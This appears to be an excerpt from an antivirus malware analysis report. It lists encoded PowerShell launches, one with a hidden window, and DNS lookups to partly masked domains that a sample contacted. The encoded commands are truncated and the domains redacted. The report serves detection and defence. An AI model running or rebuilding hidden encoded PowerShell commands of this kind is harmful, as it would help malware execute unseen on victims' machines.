Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASgByAGkAagB2AGEAeQBzAHAAdwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAGUAbgBnAGQAegBxAGIAZABsAG8AZgBoACAAIwA+ACAAJABXAGUAdQBsAG8AagB2AGEAeQBrAHgAPQ...
- DNS ASK wp.#####tificsatellite.net
- DNS ASK bl##.#owderhook.com
- DNS ASK ss##.info
- DNS ASK al###walker.com
- DNS ASK th###eekpv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASgByAGkAagB2AGEAeQBzAHAAdwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAGUAbgBnAGQAegBxAGIAZABsAG8AZgBoACAAIwA+ACAAJABXAGUAdQBsAG8AagB2AGEAeQBrAHgAPQ...' (with hidden window)